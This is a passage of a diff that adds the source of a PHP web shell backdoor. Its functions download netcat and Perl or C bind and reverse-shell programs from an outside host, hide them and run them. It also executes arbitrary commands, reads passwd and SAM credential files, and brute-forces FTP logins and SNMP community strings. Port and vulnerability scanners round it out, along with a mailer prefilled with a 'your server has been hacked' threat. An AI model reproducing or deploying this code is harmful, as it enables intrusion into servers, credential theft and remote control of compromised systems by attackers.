+$sock=@fsockopen("udp://$ip",161);
+socket_set_timeout($sock,$timeout);
+@fputs($sock,$packet);
+socket_set_timeout($sock,$timeout);
+$res=fgets($sock);
+fclose($sock);
+return $res;
+}
+
+$safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF';
+if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");}
+$disablefunctions = @ini_get('disable_functions');
+if (!function_exists("str_repeat")){
+function str_repeat($str,$c){
+$r="";
+for($i=0; $i < $cu; $i++)$r.=$str;
+return $r;
+}
+}
+
+function brshelL(){
+global $errorbox, $windows,$et,$hcwd;
+$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0;
+$addr='http://netjackal.by.ru/backdoor';
+$error="$errorbox Can not make backdoor file, go to writeable folder.$et";
+$n=namE();
+if(!$windows)$n=".$n";
+$d=whereistmP();
+$name=$d.DIRECTORY_SEPARATOR.$n;
+$perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl';
+$c=($_REQUEST['C'])?1:0;
+if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){
+$port=(int)$_REQUEST['port'];
+if($windows){
+if($c){
+$name.=".exe";
+$bd=downloadiT("$addr/nc.exe",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe");
+}else{
+$name = $name.".pl";
+$bd=downloadiT("$addr/winbind.pl",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("perl.exe $name $port");
+}
+}
+else{
+if($c){
+$bd=downloadiT("$addr/bind.c",$name);
+if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &");
+}else{
+$bd=downloadiT("$addr/bind.pl",$name);
+if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &");
+echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>";
+}
+}
+}
+elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){
+$ip=$_REQUEST['ip'];
+$port=(int)$_REQUEST['rport'];
+if($windows){
+if($c){
+$name.='.exe';
+$bd=downloadiT("$addr/nc.exe",$name);
+shelL("attrib +H $name");
+if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe");
+}else{
+$name = $name.".pl";
+$bd=downloadiT("$addr/winrc.pl",$name);
+shelL("attrib +H $name");
+if (!$bd)echo $error; else shelL("perl.exe $name $ip $port");
+}
+}
+else{
+if($c){
+$bd=downloadiT("$addr/rc.c",$name);
+if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &");
+}else{
+$bd=downloadiT("$addr/rc.pl",$name);
+if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &");
+}
+}
+echo "<font color=blue>Done!</font>";}
+else{echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"50%\" bgcolor=\"#333333\">Bind shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=port value=55501 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input type=submit class=buttons value=Bind></td></tr></form></table></td><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"40%\" bgcolor=\"#333333\">Reverse shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#808080\">IP:</td><td bgcolor=\"#808080\"><input type=text name=ip value=";echo $_SERVER["REMOTE_ADDR"]; echo " size=17></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=rport value=53 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Connect></td></tr></form></table>$et";}}
+function showimagE($img){
+echo "<center><img border=0 src=\"".hlinK("imagE=$img&&workingdiR=".getcwd())."\"></center>";}
+function editoR($file){
+global $errorbox,$et,$hcwd;
+if (is_file($file)){
+if (!is_readable($file)){echo "$errorbox File is not readable$et<br>";}
+if (!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";}
+$data = file_get_contents($file);
+echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\">$hcwd<input type=text value=\"".htmlspecialchars($file)."\" size=75 name=file><input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"64\">";
+echo htmlspecialchars($data);
+echo "</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"$file\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">";
+}
+else {echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\"><input type=text value=\"".getcwd()."\" size=75 name=file>$hcwd<input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"63\"></textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"".getcwd()."\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">";
+}
+echo "$hcwd<input type=submit class=buttons name=Save value=Save></td></form></tr></table></center>";
+}
+function webshelL(){
+global $windows,$hcwd;
+if($windows){
+$alias="<option value=\"netstat -an\">Display open ports</option><option value=\"tasklist\">List of processes</option><option value=\"systeminfo\">System information</option><option value=\"ipconfig /all\">IP configuration</option><option value=\"getmac\">Get MAC address</option><option value=\"net start\">Services list</option><option value=\"net view\">Machines in domain</option><option value=\"net user\">Users list</option><option value=\"gpresult\">Group policy</option><option value=\"shutdown -s -f -t 1\">Turn off the server</option>";
+}
+else{
+$alias="<option value=\"netstat -an | grep -i listen\">Display open ports</option><option value=\"last -a -n 250 -i\">Show last 250 logged in users</option><option value=\"which wget curl lynx w3m\">Downloaders</option><option value=\"find / -perm -2 -type d -print\">Find world-writable directories</option><option value=\"find . -perm -2 -type d -print\">Find world-writable directories(in current directory)</option><option value=\"find / -perm -2 -type f -print\">Find world-writable files</option><option value=\"find . -perm -2 -type f -print\">Find world-writable files(in current directory)</option><option value=\"find / -type f -perm 04000 -ls\">Find files with SUID bit set</option><option value=\"find / -type f -perm 02000 -ls\">Find files with SGID bit set</option><option value=\"find / -name .htpasswd -type f\">Find .htpasswd files</option><option value=\"find / -type f -name .bash_history\">Find .bash_history files</option><option value=\"cat /etc/syslog.conf\">View syslog.conf</option><option value=\"cat cat /etc/hosts\">View hosts</option><option value=\"ps auxw\">List of processes</option>";
+if(is_dir('/etc/valiases'))$alias.="<option value=\"ls -l /etc/valiases\">List of Cpanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value=\"ls -l /etc/vdomainaliases\">List Cpanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value=\"cat /var/cpanel/accounting.log\">Display Cpanel`s log</option>";
+if(is_dir('/var/spool/mail/'))$alias.="<option value=\"ls /var/spool/mail/\">Mailboxes list</option>";
+}
+echo "<center><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=82 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><tr><td><b>Web Shell:</b></td></tr><td bgcolor=\"#666666\"><textarea rows=\"22\" cols=\"78\">";
+if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']);
+echo"</textarea></td></tr><form method=post><tr><td bgcolor=\"#808080\"><input type=text size=91 name=cmd value=\"";if (!empty($_REQUEST['cmd'])) echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows) echo "cat /etc/passwd";echo "\">$hcwd<input class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor=\"#808080\"><select name=\"cmd\" width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></table><center>";
+}
+function maileR(){
+global $msgbox,$et,$hcwd;
+$cwd= getcwd();
+if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){
+$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body'];
+if (!mail($to,$subject,$body,"From: $from"))break;
+echo "$msgbox<b>Mail sent!</b><br>$et";
+}
+echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td><b>Mailer:</b></td></tr><td width=\"20%\" bgcolor=\"#666666\">SMTP</td><td bgcolor=\"#666666\">".ini_get('SMTP')." (".ini_get('smtp_port').")</td></tr><tr><td bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\"><input name=from type=text value=\"evil@hell.gov\" size=55>$hcwd</td><tr><td width=\"25%\" bgcolor=\"#666666\">To:</td><td bgcolor=\"#666666\"><input name=to type=text value=\""; if (!empty($_REQUEST['to'])) echo htmlspecialchars($_REQUEST['to']); elseif(!empty($_ENV["SERVER_ADMIN"])) echo $_ENV["SERVER_ADMIN"];else echo "admin@".getenv('HTTP_HOST'); echo "\" size=55></td></tr><tr><td bgcolor=\"#808080\">Subject:</td><td bgcolor=\"#808080\"><input name=subject type=text value=\"YOUR SERVER HAS BEED HACKED :-P\" size=55></td><tr><td bgcolor=\"#666666\">Body:</td><td bgcolor=\"#666666\"><textarea rows=\"18\" cols=\"43\" name=body>Admin, your system has been hacked! if you don`t seCure it, next time i`ll format your box.</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=\"right\"><input type=submit class=buttons value=Send></form>$et";
+}
+function scanneR(){
+global $hcwd;
+if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1";
+$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
+if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
+$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0;
+echo "<font color=blue>Port scanning started against ".htmlspecialchars($target).":<br>";
+$start=time();
+for($i=$from;$i<=$to;$i++){
+if($tcp){
+if (checkthisporT($target,$i,$timeout)){
+$nu++;
+$ser="";
+if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";
+echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>";
+}
+}
+if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";}
+flusheR();
+}
+$time=time()-$start;
+echo "Done! ($time seconds)</font>";
+}
+elseif (!empty($_REQUEST['securityscanner'])){
+echo "<font color=blue>";
+$start=time();
+$from=$_REQUEST['from'];
+$to=(int)$_REQUEST['to'];
+$timeout=(int)$_REQUEST['timeout'];
+$f = substr($from,strrpos($from,".")+1);
+$from = substr($from,0,strrpos($from,"."));
+if(!empty($_REQUEST['httpscanner'])){
+echo "Loading webserver bug list...";
+flusheR();
+$buglist=whereistmP().DIRECTORY_SEPARATOR.namE();
+$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
+if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>";
+flusheR();
+}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";}
+for($i=$f;$i<=$to;$i++){
+$output=0;
+$ip="$from.$i";
+if(!empty($_REQUEST['nslookup'])){
+$hn=gethostbyaddr($ip);
+if($hn!=$ip)echo "$ip [$hn]<br>";}
+flusheR();
+if(!empty($_REQUEST['ipscanner'])){
+$port=$_REQUEST['port'];
+if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port;
+$open=$ser="";
+foreach($p as $po){
+$scan=checkthisporT($ip,$po,$timeout);
+if ($scan){
+$ser="";
+if($ser=getservbyport($po,"tcp"))$ser="($ser)";
+$open.=" $po$ser ";
+}
+}
+if($open){echo "$ip) Open ports:$open<br>";$output=1;}
+flusheR();
+}
+if(!empty($_REQUEST['httpbanner'])){
+$res=get_sw_namE($ip,$timeout);
+if($res){
+echo "$ip) Webserver software: ";
+if($res==-1)echo "Unknow";
+else echo $res;
+echo "<br>";
+$output=1;
+}
+flusheR();
+}
+if(!empty($_REQUEST['httpscanner'])){
+if(checkthisporT($ip,80,$timeout) && !empty($file)){
+$admin=array('/admin/','/adm/');
+$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
+$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
+$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
+foreach ($file as $v){
+$vuln=array();
+$v=trim($v);
+if(!$v || $v{0}=='#')continue;
+$v=str_replace('","','^',$v);
+$v=str_replace('"','',$v);
+$vuln=explode('^',$v);
+$page=$cqich=$nukech=$adminch=$userch=$vuln[1];
+if(strstr($page,'@CGIDIRS'))
+foreach($cgi as $cg){
+$cqich=str_replace('@CGIDIRS',$cg,$page);
+$url="http://$ip$cqich";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+elseif(strstr($page,'@ADMINDIRS'))
+foreach ($admin as $cg){
+$adminch=str_replace('@ADMINDIRS',$cg,$page);
+$url="http://$ip$adminch";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+elseif(strstr($page,'@USERS'))
+foreach ($users as $cg){
+$userch=str_replace('@USERS',$cg,$page);
+$url="http://$ip$userch";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+elseif(strstr($page,'@NUKE'))
+foreach ($nuke as $cg){
+$nukech=str_replace('@NUKE',$cg,$page);
+$url="http://$ip$nukech";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+else{
+$url="http://$ip$page";
+$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
+if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
+flusheR();
+}
+}
+}
+}
+if(!empty($_REQUEST['smtprelay'])){
+if(checkthisporT($ip,25,$timeout)){
+$res='';
+$res=checksmtP($ip,$timeout);
+if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR();
+}
+}
+if(!empty($_REQUEST['snmpscanner'])){
+if(checkthisporT($ip,161,$timeout,1)){
+$com=$_REQUEST['com'];
+$coms=$res="";
+if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
+foreach ($c as $v){
+$ret=snmpchecK($ip,$v,$timeout);
+if($ret)$coms .=" $v ";
+}
+if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
+flusheR();
+}
+}
+if(!empty($_REQUEST['ftpscanner'])){
+if(checkthisporT($ip,21,$timeout)){
+$usps=explode(',',$_REQUEST['userpass']);
+foreach ($usps as $v){
+$user=substr($v,0,strpos($v,':'));
+$pass=substr($v,strpos($v,':')+1);
+if($pass=='[BLANK]')$pass='';
+$ftp=@ftp_connect($ip,21,$timeout);
+if ($ftp){
+if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";}
+}
+flusheR();
+}
+}
+}
+if($output)echo "<hr size=1 noshade>";
+flusheR();
+}
+$time=time()-$start;
+echo "Done! ($time seconds)</font>";
+if(!empty($buglist))unlink($buglist);
+}
+else{
+$chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
+echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
+$host = substr($host,0,strrpos($host,"."));
+echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
+}
+}
+function sysinfO(){
+global $windows,$disablefunctions,$safemode;
+$cwd= getcwd();
+$mil="<a target=\"_blank\" href=\"http://www.milw0rm.org/related.php?program=";
+$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
+if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
+$osver=$tsize=$fsize='';
+if ($windows){ 
+$osver = "  (".shelL("ver").")";
+$sysroot = shelL("echo %systemroot%");
+if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
+if (empty($sysroot)) $sysroot = getenv("windir");
+if (empty($sysroot)) $sysroot = "Not Found";
+if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
+for ($i=66;$i<=90;$i++){
+$drive= chr($i).':\\';
+if (is_dir($drive)){
+$fsize+=@disk_free_space($drive);
+$tsize+=@disk_total_space($drive);
+}
+}
+}else{
+$fsize=disk_free_space('/');
+$tsize=disk_total_space('/');
+}
+$disksize="Used spase: ". showsizE($tsize-$fsize) . "   Free space: ". showsizE($fsize) . "   Total space: ". showsizE($tsize);
+if (empty($CPU)) $CPU = "Unknow";
+$os = php_unamE();
+$osn=php_unamE('s');
+if(!$windows){ 
+$ker = php_unamE('r');
+$o=($osn=="Linux")?"Linux+Kernel":$osn;
+$os = str_replace($osn,"${mil}$o\">$osn</a>",$os);
+$os = str_replace($ker,"${mil}Linux+Kernel\">$ker</a>",$os);
+$inpa=':';
+}else{
+$sam = $sysroot."\\system32\\config\\SAM";
+$inpa=';';
+$os = str_replace($osn,"${mil}MS+Windows\">$osn</a>",$os);
+}
+$software=str_replace("Apache","${mil}Apache\">Apache</a>",$_SERVER['SERVER_SOFTWARE']);
+echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td>Server information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Operation system:</td><td bgcolor=\"#808080\">$os$osver</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Web server application:</td><td bgcolor=\"#666666\">$software</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">CPU:</td><td bgcolor=\"#808080\">$CPU</td></tr><td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">User domain:</td><td bgcolor=\"#808080\">";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">User name:</td><td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo "</td></tr>";
+if ($windows){
+echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Windows directory:</td><td bgcolor=\"#808080\"><a href=\"".hlinK("seC=fm&workingdiR=$sysroot")."\">$sysroot</a></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">Readable</a>"; else echo "Not readable";echo "</td></tr>";
+}
+else
+{
+echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Passwd file:</td><td bgcolor=\"#808080\">";
+if (is_readable('/etc/passwd')) echo "<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">";
+if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\">Readable</a>"; else echo "Not readable";}else echo "Not found";
+echo "</td></tr>";
+}
+$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
+echo "<tr><td width=\"25%\" bgcolor=\"#808080\">${mil}PHP\">PHP</a> version:</td><td bgcolor=\"#808080\"><a href=\"?=".php_logo_guid()."\" target=\"_blank\">".PHP_VERSION."</a> (<a href=\"".hlinK("seC=phpinfo&workingdiR=$cwd")."\">more...</a>)</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td><td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\">".zend_version()."</a>";else echo "Not Found";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Include path:</td><td bgcolor=\"#808080\">".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td><tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td><td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Disabled functions:</td><td bgcolor=\"#808080\">";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$safemode</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Open base dir:</td><td bgcolor=\"#808080\">$basedir</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td><td bgcolor=\"#666666\">";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle</a> ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" bgcolor=\"#808080\">cURL support:</td><td bgcolor=\"#808080\">Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "<tr><td>User information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">$uip</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Agent:</td><td bgcolor=\"#808080\">".getenv('HTTP_USER_AGENT')."</td></tr></table>";
+}
+function checksuM($file){
+global $et;
+echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td width=\"10%\" bgcolor=\"#666666\"><b>MD5:</b> <font color=#F0F0F0>".md5_file($file)."</font><br><b>SHA1:</b> <font color=#F0F0F0>".sha1_file($file)."</font>$et";
+}
